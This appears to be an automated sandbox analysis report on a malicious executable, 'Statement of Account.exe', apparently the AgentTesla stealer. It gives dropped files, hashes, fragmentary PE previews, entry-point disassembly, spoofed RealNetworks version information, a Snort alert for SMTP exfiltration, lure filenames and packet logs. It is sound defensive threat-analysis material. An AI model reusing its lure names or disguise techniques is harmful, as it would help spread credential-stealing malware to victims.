                                                        Process:C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):42
                                                        Entropy (8bit):4.0050635535766075
                                                        Encrypted:false
                                                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                        Malicious:false
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                        C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):65440
                                                        Entropy (8bit):6.049806962480652
                                                        Encrypted:false
                                                        SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                        MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                        SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                        SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                        SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: correction HAWB.exe, Detection: malicious, Browse
                                                        • Filename: DOC 10132021.exe, Detection: malicious, Browse
                                                        • Filename: WIRE ADVICE.exe, Detection: malicious, Browse
                                                        • Filename: Foreign_Bank Account Details.exe, Detection: malicious, Browse
                                                        • Filename: SOA.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Variant.Razy.961905.21681.exe, Detection: malicious, Browse
                                                        • Filename: Swift USD 9300.exe, Detection: malicious, Browse
                                                        • Filename: SOA.exe, Detection: malicious, Browse
                                                        • Filename: justificante.exe, Detection: malicious, Browse
                                                        • Filename: Facilitative8.exe, Detection: malicious, Browse
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                        C:\Windows\System32\drivers\etc\hosts
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):835
                                                        Entropy (8bit):4.694294591169137
                                                        Encrypted:false
                                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                        MD5:6EB47C1CF858E25486E42440074917F2
                                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                        Malicious:true
                                                        Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                                                        \Device\ConDrv
                                                        Process:C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1049
                                                        Entropy (8bit):4.286073681226177
                                                        Encrypted:false
                                                        SSDEEP:24:z3d3+DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zNODBXZxo4ABV+SrUYE
                                                        MD5:402278578416001C915480C7040F2964
                                                        SHA1:B4833865ECE3609EC213509D4AB7D7A195C00753
                                                        SHA-256:86E0747C9B54AA9AACB788589E70E19279DF13F1393795E689342AF3302912E1
                                                        SHA-512:473600FBC051B22E9E7A6FBE1694ED736CF90DE5A8DF92AF1FA9A85DDD97379CFF0E8A5DF89937AE083BEBEFC81C407A907D0FB5ED9019BEDF6FB4703838321B
                                                        Malicious:false
                                                        Preview: Microsoft .NET Framework Assembly Registration Utility version 4.8.4084.0..for Microsoft .NET Framework version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.343524499435611
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:Statement of Account.exe
                                                        File size:135168
                                                        MD5:1232806812f946a2afabc5f5fe489de5
                                                        SHA1:f9a820627667403e90b3a387de0b644f8f0ddc31
                                                        SHA256:86907475c81bc4700fc465c758592c51e905feed8aecdc0c10ccb6a8c650218a
                                                        SHA512:14e655a40e696c7fedc58754e4263c512a2d0d0b922daee5c3e84594b3c639b0995e7b57ac10af97c69098e9bc9e42f336999fbafb44bb79470f4d568f690c4e
                                                        SSDEEP:1536:BO7rxt7IPeC+EPGqwK+L1zDfCyuOiye7cuA+gg+5fTMZ9cBjyG3VqbfuYpZN88M+:U7dK2CneTx3Cyi31SQLGZq
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....9X.....................`......h.............@.............B..

                                                        File Icon

                                                        Icon Hash:20047c7c70f0e004

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401868
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x5839B8B9 [Sat Nov 26 16:30:49 2016 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:c727a98e677fb7bd25bb06d2a2d956f1

                                                        Entrypoint Preview

                                                        Instruction
                                                        push 00410318h
                                                        call 00007FC8C46F90B5h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        cmp byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        sal byte ptr [esi-4E903F92h], 1
                                                        jle 00007FC8C46F910Fh
                                                        stosd
                                                        pop es
                                                        cmpsb
                                                        mov edi, 36CC837Eh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [eax], eax
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        test al, 60h
                                                        push cs
                                                        add ecx, dword ptr [ecx+4Eh]
                                                        inc esp
                                                        inc edx
                                                        push edx
                                                        add byte ptr [edx], ah
                                                        add al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add bh, bh
                                                        int3
                                                        xor dword ptr [eax], eax
                                                        and esp, dword ptr [eax]
                                                        add al, D8h
                                                        pushad
                                                        scasb
                                                        rcr ah, cl
                                                        inc ebp
                                                        mov dword ptr [ecx-39h], ecx
                                                        mov dh, 86h
                                                        div dword ptr [ebx-54h]
                                                        into
                                                        jecxz 00007FC8C46F9045h
                                                        mov bl, A5h
                                                        aad 49h
                                                        dec esp
                                                        mov esp, 19989AB2h
                                                        idiv dword ptr [ebp-46h]
                                                        cmp cl, byte ptr [edi-53h]
                                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                                        or al, 00h
                                                        stosb
                                                        add byte ptr [eax-2Dh], ah
                                                        xchg eax, ebx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc ecx, ebp
                                                        add byte ptr [eax], al
                                                        inc ebx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        or dword ptr [eax], eax
                                                        arpl word ptr [ebp+6Ch], sp
                                                        bound esi, dword ptr [edx+65h]
                                                        jnc 00007FC8C46F912Ah
                                                        add byte ptr [54000601h], cl
                                                        push 35656572h
                                                        add byte ptr [ecx], bl
                                                        add dword ptr [eax], eax
                                                        inc edx
                                                        add byte ptr [edx], ah

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1a8940x28.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x4562.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x154.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x19dd00x1a000False0.568171574519data6.81553512761IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .data0x1b0000xaf00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x1c0000x45620x5000False0.39609375data4.60717950331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        DATA0x1ca740x3aeeMS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixelEnglishUnited States
                                                        RT_ICON0x1c9440x130data
                                                        RT_ICON0x1c65c0x2e8data
                                                        RT_ICON0x1c5340x128GLS_BINARY_LSB_FIRST
                                                        RT_GROUP_ICON0x1c5040x30data
                                                        RT_VERSION0x1c1a00x364dataEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaI2Str, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0409 0x04b0
                                                        LegalCopyrightRealNetworks, Inc.
                                                        InternalNameedderfu
                                                        FileVersion66.00
                                                        CompanyNameRealNetworks, Inc.
                                                        LegalTrademarksRealNetworks, Inc.
                                                        CommentsRealNetworks, Inc.
                                                        ProductNameRealNetworks, Inc.
                                                        ProductVersion66.00
                                                        FileDescriptionRealNetworks, Inc.
                                                        OriginalFilenameedderfu.exe

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        10/13/21-14:41:14.270686TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49821587192.168.11.2065.60.11.90

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 13, 2021 14:39:35.682610035 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.682684898 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:35.682831049 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.701250076 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.701292992 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:35.748425007 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:35.748557091 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.748572111 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.748603106 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.749917984 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:35.750081062 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.867228031 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.867284060 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:35.867952108 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:35.868160009 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.871714115 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:35.913934946 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:36.386960983 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:36.387079000 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:36.387172937 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:36.387206078 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:36.387228012 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:36.387340069 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:36.387362957 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:36.387502909 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:36.392077923 CEST49809443192.168.11.20172.217.168.46
                                                        Oct 13, 2021 14:39:36.392127991 CEST44349809172.217.168.46192.168.11.20
                                                        Oct 13, 2021 14:39:36.428282976 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.428361893 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.428563118 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.428809881 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.428865910 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.482053995 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.482203007 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.482292891 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.485323906 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.485479116 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.485637903 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.489346027 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.489375114 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.489815950 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.489940882 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.490255117 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.533927917 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.724240065 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.724462032 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.724497080 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.725014925 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.725275040 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.725750923 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.725893974 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.725996017 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.727113962 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.727289915 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.727320910 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.727334023 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.727355003 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.727547884 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.728215933 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.728435040 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.728481054 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.728737116 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.734549046 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.734719992 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.734752893 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.734905005 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.734946012 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.734977961 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.735097885 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.735155106 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.735630035 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.735838890 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.735886097 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.736073971 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.736298084 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.736587048 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.736633062 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.736891985 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.737112045 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.737318039 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.737364054 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.737535954 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.737765074 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.737916946 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.737952948 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.738208055 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.738411903 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.738617897 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.738663912 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.738892078 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.739183903 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.739339113 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.739377022 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.739578009 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.740000963 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.740170002 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.740209103 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.740508080 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.740735054 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.740942955 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.740988970 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.741195917 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.741420984 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.741625071 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.741671085 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.741818905 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.742074013 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.742223978 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.742254972 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.742394924 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.742415905 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.742563009 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.742710114 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.742863894 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.742893934 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.743067026 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.743504047 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.743736029 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.743782043 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.744038105 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.744245052 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.744426966 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.744462013 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.744678974 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.745080948 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.745229959 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.745285988 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.745316982 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.745379925 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.745491028 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.745642900 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.745781898 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.745798111 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.745817900 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.745978117 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.746006966 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.746155024 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.746664047 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.746803045 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.746824026 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.746845007 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.747040033 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.747070074 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.747308016 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.747651100 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.747817993 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.747894049 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.747908115 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.747940063 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.747987032 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.748053074 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.748150110 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.748594046 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.748760939 CEST49810443192.168.11.20142.250.181.225
                                                        Oct 13, 2021 14:39:36.748795986 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.748902082 CEST44349810142.250.181.225192.168.11.20
                                                        Oct 13, 2021 14:39:36.748953104 CEST49810443192.168.11.20142.250.181.225
